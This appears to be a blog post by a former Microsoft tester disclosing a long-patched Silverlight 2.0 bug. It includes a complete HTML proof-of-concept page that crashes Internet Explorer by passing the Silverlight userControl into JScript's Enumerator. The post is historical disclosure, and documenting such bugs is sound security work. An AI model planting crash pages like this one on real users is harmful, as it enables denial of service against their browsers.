DoS: Silverlight Crash via Enumerator on userControl

Another brief one from the same Silverlight testing session. Passing the userControl object from the onLoad event into IE’s Enumerator constructor would crash the browser immediately. The crash was reproducible on demand by clicking a button to (re)load the control.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>DoS_Silverlight_userControl_Enumerator</title>
</head>
<body>
<h1>DoS_Silverlight_userControl_Enumerator</h1>

<script language="JavaScript">

function onSilverlightLoad(userControl)
{
	new Enumerator(userControl);
}

</script>

<object id="SilverlightControl" data="data:application/x-silverlight," type="application/x-silverlight-2-b1" width="450" height="50">
	<param name="source" value="any_xap_is_fine.xap"/>
	<param name="onLoad" value="onSilverlightLoad" />
	<param name="enableHtmlAccess" value="true" />
	<param name="background" value="white" />
</object>
<br />
<input type="button" onclick="document.getElementById('SilverlightControl').Source='any_xap_is_fine.xap'" value="Load the Control!"><br />
(the onload will fire and the browser will crash)
<br /><small>Tested on Silverlight v.2.0.<b>30220</b>.0</small>
</body>
</html>

The Enumerator constructor in JScript is designed for COM collection objects. When handed the Silverlight userControl reference, it triggered an unhandled exception inside the Silverlight host, taking the browser down with it. Any XAP file worked — even a trivially small one. Tested on Silverlight 2.0.30220.0.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Popup Blocker Bypass via Silverlight's Delayed HtmlPage.Window.Eval] :: [IE7 Resident - opener, createElement, OBJECT] >